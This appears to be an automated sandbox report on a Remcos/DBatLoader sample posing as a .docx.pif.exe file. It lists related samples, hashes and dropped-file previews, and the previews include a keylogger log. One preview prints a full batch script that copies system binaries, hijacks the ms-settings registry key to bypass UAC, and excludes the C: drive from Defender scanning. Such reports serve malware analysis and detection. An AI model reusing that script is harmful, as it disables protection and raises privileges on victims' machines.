• Filename: rQuotation.exe, Detection: malicious, Threat Name: AgentTesla, Context: 108.170.55.203
• URL: http://beonlineboo.com, Detection: malicious, Threat Name: Unknown, Context: 209.188.14.135
• Filename: Quotation.exe, Detection: malicious, Threat Name: AgentTesla, Context: 108.170.55.203
• Filename: Your file name without extension goes here.exe, Detection: malicious, Threat Name: AgentTesla, Context: 108.170.55.202
• Filename: ORDER060424.exe, Detection: malicious, Threat Name: AgentTesla, Context: 184.95.55.27
• Filename: R9eF05c3nd.exe, Detection: malicious, Threat Name: AgentTesla, Context: 108.170.55.202
• Filename: y8116vE0F0.exe, Detection: malicious, Threat Name: AgentTesla, Context: 108.170.55.203
• Filename: INQUIRY.exe, Detection: malicious, Threat Name: AgentTesla, Context: 108.170.55.203
• Filename: PURCHASE ORDER No. 4500148605.exe, Detection: malicious, Threat Name: AgentTesla, Context: 108.170.55.203
• Filename: Your file name without extension goes here.exe, Detection: malicious, Threat Name: AgentTesla, Context: 108.170.55.203
Match: a0e9f5d64349fb13191bc781f81f42e1 (Associated Sample Name / URL, Detection, Threat Name, Context)
• Filename: pago pendientes.xls, Detection: malicious, Threat Name: Unknown, Context: 108.170.55.202
• Filename: fechas de pago.xls, Detection: malicious, Threat Name: Unknown, Context: 108.170.55.202
• Filename: 457525.xls, Detection: malicious, Threat Name: Unknown, Context: 108.170.55.202
• Filename: 0cjB1Kh8zU.msi, Detection: malicious, Threat Name: Unknown, Context: 108.170.55.202
• Filename: SecuriteInfo.com.Win32.Evo-gen.21718.4342.exe, Detection: malicious, Threat Name: BlackMoon, Context: 108.170.55.202
• Filename: SecuriteInfo.com.Win32.Evo-gen.21718.4342.exe, Detection: malicious, Threat Name: BlackMoon, Context: 108.170.55.202
• Filename: 1.scr, Detection: malicious, Threat Name: Unknown, Context: 108.170.55.202
• Filename: 1.scr, Detection: malicious, Threat Name: Unknown, Context: 108.170.55.202
• Filename: SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe, Detection: malicious, Threat Name: LummaC, Context: 108.170.55.202
• Filename: Informational-severity alert_ Creation of forwarding_redirect rule Case ID_FqJxoz8.eml, Detection: malicious, Threat Name: Unknown, Context: 108.170.55.202
Match: C:\Users\Public\alpha.exe (Associated Sample Name / URL, Detection, Threat Name)
• Filename: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, Detection: malicious, Threat Name: DBatLoader, Remcos
• Filename: PO-MISA-32493.cmd, Detection: malicious, Threat Name: Remcos, DBatLoader
• Filename: New PO -39850-1064 -2084-GEN101 -Order,xls.exe, Detection: malicious, Threat Name: AgentTesla, DBatLoader, PureLog Stealer
• Filename: PURCHASE_ORDER.CMD, Detection: malicious, Threat Name: DBatLoader, Remcos
• Filename: ProofOfPayment.CMD, Detection: malicious, Threat Name: DBatLoader, Neshta, Remcos
• Filename: Rylorhzz.PIF.exe, Detection: malicious, Threat Name: DBatLoader, FormBook
• Filename: PO# 2011-0227160-0365-06-24,xls.exe, Detection: malicious, Threat Name: AgentTesla, DBatLoader, PureLog Stealer
• Filename: ProofOfPayment.CMD, Detection: malicious, Threat Name: DBatLoader, Neshta, Remcos
• Filename: proof.cmd, Detection: malicious, Threat Name: DBatLoader, Remcos
• Filename: SWIFT_COPY20240604.cmd, Detection: malicious, Threat Name: DBatLoader
Match: C:\Users\Public\Libraries\drbdmeyP.pif (Associated Sample Name / URL, Detection, Threat Name)
• Filename: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, Detection: malicious, Threat Name: DBatLoader, Remcos
• Filename: PO-MISA-32493.cmd, Detection: malicious, Threat Name: Remcos, DBatLoader
• Filename: New PO -39850-1064 -2084-GEN101 -Order,xls.exe, Detection: malicious, Threat Name: AgentTesla, DBatLoader, PureLog Stealer
• Filename: PURCHASE_ORDER.CMD, Detection: malicious, Threat Name: DBatLoader, Remcos
• Filename: ProofOfPayment.CMD, Detection: malicious, Threat Name: DBatLoader, Neshta, Remcos
• Filename: Rylorhzz.PIF.exe, Detection: malicious, Threat Name: DBatLoader, FormBook
• Filename: PO# 2011-0227160-0365-06-24,xls.exe, Detection: malicious, Threat Name: AgentTesla, DBatLoader, PureLog Stealer
• Filename: ProofOfPayment.CMD, Detection: malicious, Threat Name: DBatLoader, Neshta, Remcos
• Filename: proof.cmd, Detection: malicious, Threat Name: DBatLoader, Remcos
• Filename: rINV200495000-PAYORDER0940584.cmd, Detection: malicious, Threat Name: AgentTesla, DBatLoader, PureLog Stealer
                                                                            Process:C:\Windows\SysWOW64\colorcpl.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):428
                                                                            Entropy (8bit):3.3208926935002046
                                                                            Encrypted:false
                                                                            SSDEEP:6:6lVMol3l55YcIeeDAlIfE/OS/1fmPm1gWAGfE/OSFWAZi8WAv:6lVL3DecB/OSVmlWa/OSFWr8W+
                                                                            MD5:AE19BACC9221372C637448D591CAFB06
                                                                            SHA1:81B882ECEBD44624C34A02361EE2BC008EEC4A28
                                                                            SHA-256:649BD2D85E96CA21A0ABFB35145DA75915DC0A3E43FA9C4DEB775B1BBA5F30B2
                                                                            SHA-512:083BBCB16078447954A4689D8FE2D25FF3F3F269490A0CCC5CFA89E1BAEC1B54B94D325B89357DADE45FAE31098C152EE2A53D57089A8F4F266C703D05F7F053
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\gaban\logs.dat, Author: Joe Security
                                                                            Preview:....[.2.0.2.4./.0.7./.0.3. .0.2.:.5.7.:.0.0. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.C.o.l.o.u.r. .M.a.n.a.g.e.m.e.n.t.].........[.R.u.n.].........[.S.e.t.t.i.n.g.s.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.C.o.l.o.u.r. .M.a.n.a.g.e.m.e.n.t.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.N.e.w. .n.o.t.i.f.i.c.a.t.i.o.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                            Process:C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):3
                                                                            Entropy (8bit):1.584962500721156
                                                                            Encrypted:false
                                                                            SSDEEP:3:p:p
                                                                            MD5:A5EA0AD9260B1550A14CC58D2C39B03D
                                                                            SHA1:F0AEDF295071ED34AB8C6A7692223D22B6A19841
                                                                            SHA-256:F1B2F662800122BED0FF255693DF89C4487FBDCF453D3524A42D4EC20C3D9C04
                                                                            SHA-512:7C735C613ECE191801114785C1EE26A0485CBF1E8EE2C3B85BA1AD290EF75EEC9FEDE5E1A5DC26D504701F3542E6B6457818F4C1D62448D0DB40D5F35C357D74
                                                                            Malicious:false
                                                                            Preview:1..
                                                                            Process:C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):803618
                                                                            Entropy (8bit):7.398863408633209
                                                                            Encrypted:false
                                                                            SSDEEP:12288:iUCWyFBzYrow4qyU9IDu94jmPcHhMoJeonoE3HxNnrpEGOFz9cWVAfGWYHW8:iiyF1YroDq92ucmPcHa5o5IFBe+Z
                                                                            MD5:93DB1FEB88FB94D374EC047F2A92A473
                                                                            SHA1:742BDAFB4F36FAFFEC4D64148872801E0D85004F
                                                                            SHA-256:FF6CEDF6A3BD5FB08FB0A3DDA807B9E297F66652C5C237D00716916B5603A87E
                                                                            SHA-512:B5094C42D12BFA1CEDEAC22A3AE9E8C137E2714DC414D0627F31CB0D5D49FACF6EF8D0A6D778F81201A03E67642C207B1E9B7C41F739A30E06367D730BCD5F85
                                                                            Malicious:true
                                                                            Preview:...Y#..K.......#.#.&..."..#.$ ...!..''...%..'&&" .#...$."....Y#..K.&........ ...Y#..K`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuy.hhve\ppg^{regpsswyetxdku..%`...]Y.$hU.hdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdgwhftcuyzhhve\ppg^{regpsswyetxdkuew{`__x]x\thtcshdg
                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1085440
                                                                            Entropy (8bit):6.781096986708226
                                                                            Encrypted:false
                                                                            SSDEEP:24576:YgjfgAhthN1aH674weG2Xiou9TBeWyKvBeI+T68sjjX:YUtNCGTBXyKv8vT6r
                                                                            MD5:B9DA5A47E1E68EF90C075DC14F8E2037
                                                                            SHA1:4AE96232817BF7B3919AA298EFC7C0D18649ED9D
                                                                            SHA-256:8DBCCD1C7BDB8DA3A34C2A4AC5C62FB6774CE2ABAC29CAF899039D19A5D27555
                                                                            SHA-512:649F021B95B4616EF7F74573F22231E4C9F27BF840EA2CBD13B588698579D4D87FDA2DB521A04FF434E76E928BBFB940AF4547C85F7B578F9585B92902A08F68
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 45%
                                                                            • Antivirus: Virustotal, Detection: 50%, Browse
                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..................................... ....@..............................................@..............................V&.......>...................`...n...........................P......................8................................text............................... ..`.itext...5.......6.................. ..`.data...X.... ......................@....bss.....6...............................idata..V&.......(..................@....tls....4....@...........................rdata.......P......................@..@.reloc...n...`...p..................@..B.rsrc....>.......>...R..............@..@....................................@..@................................................................................................
                                                                            Process:C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):68096
                                                                            Entropy (8bit):6.328046551801531
                                                                            Encrypted:false
                                                                            SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                            MD5:C116D3604CEAFE7057D77FF27552C215
                                                                            SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                            SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                            SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                            Joe Sandbox View:
                                                                            • Filename: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, Detection: malicious, Browse
                                                                            • Filename: PO-MISA-32493.cmd, Detection: malicious, Browse
                                                                            • Filename: New PO -39850-1064 -2084-GEN101 -Order,xls.exe, Detection: malicious, Browse
                                                                            • Filename: PURCHASE_ORDER.CMD, Detection: malicious, Browse
                                                                            • Filename: ProofOfPayment.CMD, Detection: malicious, Browse
                                                                            • Filename: Rylorhzz.PIF.exe, Detection: malicious, Browse
                                                                            • Filename: PO# 2011-0227160-0365-06-24,xls.exe, Detection: malicious, Browse
                                                                            • Filename: ProofOfPayment.CMD, Detection: malicious, Browse
                                                                            • Filename: proof.cmd, Detection: malicious, Browse
                                                                            • Filename: rINV200495000-PAYORDER0940584.cmd, Detection: malicious, Browse
                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@
                                                                            Process:C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
                                                                            File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Pyemdbrd.PIF">), ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):99
                                                                            Entropy (8bit):4.98891593327246
                                                                            Encrypted:false
                                                                            SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMYHt3vsb50IAgv:HRYFVmTWDyz5tfE509gv
                                                                            MD5:77E5BC66C26EE0BB84A1DACF4C1EF258
                                                                            SHA1:A4992EAF129F9D9162A10A6BC65CA8836AA58A93
                                                                            SHA-256:F93B60936204F09F914E8C055E2570BDA112C26C804AD141B150F0306325FBDB
                                                                            SHA-512:CD88ACEC0E704B6F9FE82FECD2045A64209EF2748269BF1EC203FB67176B458662F7C1B5020290C9938F57FDA712A73F5D36A80B1DB3972322957A47C2D5D745
                                                                            Malicious:true
                                                                            Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Pyemdbrd.PIF"..IconIndex=17..HotKey=4..
                                                                            Process:C:\Windows\System32\extrac32.exe
                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                            Category:modified
                                                                            Size (bytes):289792
                                                                            Entropy (8bit):6.135598950357573
                                                                            Encrypted:false
                                                                            SSDEEP:6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
                                                                            MD5:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            SHA1:F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
                                                                            SHA-256:B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
                                                                            SHA-512:99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                            Joe Sandbox View:
                                                                            • Filename: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, Detection: malicious, Browse
                                                                            • Filename: PO-MISA-32493.cmd, Detection: malicious, Browse
                                                                            • Filename: New PO -39850-1064 -2084-GEN101 -Order,xls.exe, Detection: malicious, Browse
                                                                            • Filename: PURCHASE_ORDER.CMD, Detection: malicious, Browse
                                                                            • Filename: ProofOfPayment.CMD, Detection: malicious, Browse
                                                                            • Filename: Rylorhzz.PIF.exe, Detection: malicious, Browse
                                                                            • Filename: PO# 2011-0227160-0365-06-24,xls.exe, Detection: malicious, Browse
                                                                            • Filename: ProofOfPayment.CMD, Detection: malicious, Browse
                                                                            • Filename: proof.cmd, Detection: malicious, Browse
                                                                            • Filename: SWIFT_COPY20240604.cmd, Detection: malicious, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OH...&...&...&..V...&..E%...&..E"...&...'../&..E'...&..E#...&..E+...&..E....&..E$...&.Rich..&.................PE..d...S.............".................P..........@.............................p............`.................................................(...................4#...........`......`Z..T............................,...............4...... ........................text............................... ..`.rdata..<.... ......................@..@.data...P...........................@....pdata..4#.......$..................@..@.didat..............................@....rsrc...............................@..@.reloc.......`.......h..............@..B........................................................................................................................................................................................................................
                                                                            Process:C:\Windows\System32\extrac32.exe
                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                            Category:modified
                                                                            Size (bytes):77312
                                                                            Entropy (8bit):5.996265028984654
                                                                            Encrypted:false
                                                                            SSDEEP:1536:/ZsKjopjN/cYXsuMdCAOznsA5q+oxxhRO+sAg9RyTVZiJXpnvo/vrK:FW5nspdCbzpq+iLcqjWXpvo/vm
                                                                            MD5:227F63E1D9008B36BDBCC4B397780BE4
                                                                            SHA1:C0DB341DEFA8EF40C03ED769A9001D600E0F4DAE
                                                                            SHA-256:C0E25B1F9B22DE445298C1E96DDFCEAD265CA030FA6626F61A4A4786CC4A3B7D
                                                                            SHA-512:101907B994D828C83587C483B4984F36CAF728B766CB7A417B549852A6207E2A3FE9EDC8EFF5EEAB13E32C4CF1417A3ADCCC089023114EA81974C5E6B355FED9
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........................................................r.........Rich............PE..d....6<..........."..........N.................@.............................p......@.....`.......... ..........................................D....P.......@..,............`..D.......T...........................0...............H...x............................text...p........................... ..`.rdata..(........0..................@..@.data...(....0......................@....pdata..,....@......................@..@.rsrc........P.......$..............@..@.reloc..D....`.......,..............@..B........................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\System32\extrac32.exe
                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                            Category:modified
                                                                            Size (bytes):452608
                                                                            Entropy (8bit):5.459268466661775
                                                                            Encrypted:false
                                                                            SSDEEP:6144:r2fdXxswSX0z/YWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:qVXqXEgW2KXzJ4pdd3klnnWosPhnzq
                                                                            MD5:04029E121A0CFA5991749937DD22A1D9
                                                                            SHA1:F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054
                                                                            SHA-256:9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F
                                                                            SHA-512:6A2FB055473033FD8FDB8868823442875B5B60C115031AAEDA688A35A092F6278E8687E2AE2B8DC097F8F3F35D23959757BF0C408274A2EF5F40DDFA4B5C851B
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./..%k.ovk.ovk.ovu..vi.ovb..va.ov..lwi.ov..kwq.ovk.nv.ov..nwn.ov..jwb.ov..bwb.ov..vj.ov..mwj.ovRichk.ov........................PE..d....A.~.........."..........^......@=.........@..........................................`.......... .......................................L...........}...p..........................T......................(..................`................................text............................... ..`.rdata.............................@..@.data...,....`.......L..............@....pdata.......p.......T..............@..@.rsrc....}.......~...^..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\Public\xkn.exe
                                                                            File Type:CSV text
                                                                            Category:dropped
                                                                            Size (bytes):2667
                                                                            Entropy (8bit):5.3546132390144345
                                                                            Encrypted:false
                                                                            SSDEEP:48:MxHKQwYHKGSI6o6+ztYsTzHNpDHmAHKKkWHKmHKe6ftHTHq+0trK7mHKwl9:iqbYqGSI6o9xYsntpDxqKkWqmq1ftzHK
                                                                            MD5:A477C52686412872F51E6EADC0EE00E8
                                                                            SHA1:97AF03D2CD45488E73DCB72720F6EB704DB687B6
                                                                            SHA-256:9478FEA68BD400729D6132BC0D47527BE473E45F64C17C4568F655C188EA3C6A
                                                                            SHA-512:BF00A82630532385C5A9E1C7B2B95C6E09AB671E8D59A9129837A763F9A44C654ACE578F15F27A4FEF1CB01A800FAB850A6FAD85272ABB26EFA87442F320A52A
                                                                            Malicious:false
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\0827b790b8e74d0d12643297a812ae07\Microsoft.PowerShell.ConsoleHost.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\27947b366dfb4feddb2be787d72ca90d\System.Management.Automation.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d5
                                                                            Process:C:\Users\Public\xkn.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):64
                                                                            Entropy (8bit):0.773832331134527
                                                                            Encrypted:false
                                                                            SSDEEP:3:Nlllulo:NllU
                                                                            MD5:1868BD5DBAA1C3487BECA84BADCA4326
                                                                            SHA1:CE9229CBD2D84DB536C9BF4CC56A7765433AA956
                                                                            SHA-256:014955686776BC8F3512DD1E80A35170C73556A679B8AC33567FEAEB5D11AC70
                                                                            SHA-512:A4DE3F82BBD3113F2283E84991442881AC4129273063F81E2FF506051505CC647782FCF609E7B3BDAA8D0E5A8F13852D3637FF78D590467903E54E87E9085450
                                                                            Malicious:false
                                                                            Preview:@...e.................................~.........................
                                                                            Process:C:\Users\Public\Libraries\drbdmeyP.pif
                                                                            File Type:ASCII text, with very long lines (324), with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1827
                                                                            Entropy (8bit):4.970079351882489
                                                                            Encrypted:false
                                                                            SSDEEP:48:zBrqus6bgc8gKLPgH312hwa2/7yIO15dUHQTgGWBnl:9uus6b/8hLPU12hToyIA5dUH0jWBl
                                                                            MD5:E62F427202D3E5A3BA60EBE78567918C
                                                                            SHA1:6EF0CD5BA6C871815FCEB27FF095A7931452B334
                                                                            SHA-256:06BEE225A830EA0E67B91FD7D24280C5315EF82049B25B07C9CFDE4E36A639FF
                                                                            SHA-512:E15148BA4099F3B8C73319BE32A5F76226D21E7FB90123BEC68E5106D03B7D3E8AF8CAA0421667920967E8921787BA255DC4BF23D35792BF8E9A20F1E18283C6
                                                                            Malicious:true
                                                                            Preview:@shift /0..@echo off..C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" >nul 2>nul &..C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows " >nul 2>nul &..C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32" >nul 2>nul &..C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" >nul 2>nul &..C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" >nul 2>nul &..C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" >nul 2>nul &..C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " >nul 2>nul &..
                                                                            Process:C:\Users\Public\xkn.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Users\Public\xkn.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\extrac32.exe
                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                            Category:modified
                                                                            Size (bytes):49664
                                                                            Entropy (8bit):5.876977574715819
                                                                            Encrypted:false
                                                                            SSDEEP:768:WwU7bDT2KLt6oPjQQ5fxGIjN44MgZkD9TpiPogpUORaNpohsySZlv7:WtfT2KwoPBxjN4zDbgpUOoo1SZ17
                                                                            MD5:85018BE1FD913656BC9FF541F017EACD
                                                                            SHA1:26D7407931B713E0F0FA8B872FEECDB3CF49065A
                                                                            SHA-256:C546E05D705FFDD5E1E18D40E2E7397F186A7C47FA5FC21F234222D057227CF5
                                                                            SHA-512:3E5903CF18386951C015AE23DD68A112B2F4B0968212323218C49F8413B6D508283CC6AAA929DBEAD853BD100ADC18BF497479963DAD42DFAFBEB081C9035459
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y.-.=.C.=.C.=.C.4...#.C.).F.<.C.).@.?.C.).G.).C.).B.6.C.=.B.O.C.).K.;.C.)..<.C.).A.<.C.Rich=.C.........................PE..d....*}..........."..........D......`..........@............................. ....................... ..........................................h...............X.......................T........................... ...............8................................text.............................. ..`.imrsiv..................................rdata..2&.......(..................@..@.data...............................@....pdata..X...........................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................
                                                                            Process:C:\Users\Public\ger.exe
                                                                            File Type:ASCII text, with CRLF, CR line terminators
                                                                            Category:dropped
                                                                            Size (bytes):40
                                                                            Entropy (8bit):4.237326145256008
                                                                            Encrypted:false
                                                                            SSDEEP:3:bqX4LxGT82AGN8cyn:bqX4E8NGN8Rn
                                                                            MD5:13015015DD907D28996153DF14881252
                                                                            SHA1:532C595BAAE0A027D02D1B28D7B83D57350A310E
                                                                            SHA-256:4499283166530CE395CBC12677FEF2BD52759EACDCC5BDDE56C039B1A2E99C0B
                                                                            SHA-512:B81FB62AB27E7722BFCB386766FFA1D1EBA05B8B03CD5D2160BB2570F87568381D923AC75017D785E1DEC1685769023727F4280E27C2A69CDE69772CA62E2A92
                                                                            Malicious:false
                                                                            Preview:The operation completed successfully....
                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):6.781096986708226
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.81%
                                                                            • Windows Screen Saver (13104/52) 0.13%
                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            File name:#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
                                                                            File size:1'085'440 bytes
                                                                            MD5:b9da5a47e1e68ef90c075dc14f8e2037
                                                                            SHA1:4ae96232817bf7b3919aa298efc7c0d18649ed9d
                                                                            SHA256:8dbccd1c7bdb8da3a34c2a4ac5c62fb6774ce2abac29caf899039d19a5d27555
                                                                            SHA512:649f021b95b4616ef7f74573f22231e4c9f27bf840ea2cbd13b588698579d4d87fda2db521a04ff434e76e928bbfb940af4547c85f7b578f9585b92902a08f68
